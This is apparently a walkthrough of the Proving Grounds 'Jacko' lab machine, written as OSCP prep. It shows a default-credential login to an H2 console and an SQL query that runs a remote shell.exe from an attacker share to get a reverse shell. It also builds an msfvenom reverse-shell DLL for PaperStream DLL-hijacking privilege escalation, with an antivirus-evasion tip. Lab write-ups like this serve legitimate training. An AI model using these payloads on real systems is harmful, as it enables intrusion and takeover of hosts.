Logo
Overview

PG: Jacko | Walkthrough

November 18, 2021
2 min read
PG/Machines Boot2Root OSCP/Prep CVE/H2DB writeups tools/msfvenom vuln/RCE DLL hijacking

PG - Jacko | Exploitation notes

Enumeration

Nmap Scan

Terminal window
$ nmap $ip -sVC -oN nmapInitial.txt -Pn


PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
8082/tcp open  http          H2 database http console
|_http-title: H2 Console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 8082: login to H2 console using default credential sa:<blank>

Initial Exploitation

This version of H2 is vulnerable to Remote code execution via JNI

Create payload using msfvenom and get the shell by executing following sql query:

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.106/share/shell.exe").getInputStream()).useDelimiter("\\Z").next()');
Terminal window
$ nc -nvlp 8082
listening on [any] 8082 ...
connect to [192.168.49.106] from (UNKNOWN) [192.168.106.66] 50530
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>

Fix path variable

Terminal window
C:\Program Files (x86)\H2\service>whoami
'whoami' is not recognized as an internal or external command,operable program or batch file.
C:\Program Files (x86)\H2\service>set PATH=%SystemRoot%\system32;%SystemRoot%;
C:\Program Files (x86)\H2\service>whoami
jacko\tony

Privilege Escalation

enumerate installed programs dir "C:\Program Files (x86)"

Installed version of paperstream ip is vulnerable to DLL hijacking

Terminal window
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.106 LPORT=445 -f dll -o UninOldIS.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 8704 bytes
Saved as: UninOldIS.dll
Note

Edit path to $PayloadFile = "C:\Users\tony\Desktop\UninOldIS.dll" if the dll file on c:\windows\temp is being deleted by AV.

Terminal window
C:\Users\tony\Desktop>copy \\192.168.49.106\share\exploit.ps1 exploit.ps1
copy \\192.168.49.106\share\exploit.ps1 exploit.ps1
        1 file(s) copied.


C:\Users\tony\Desktop>copy \\192.168.49.106\share\UninOldIS.dll UninOldIS.dll
copy \\192.168.49.106\share\UninOldIS.dll UninOldIS.dll
        1 file(s) copied.


C:\Users\tony\Desktop>C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1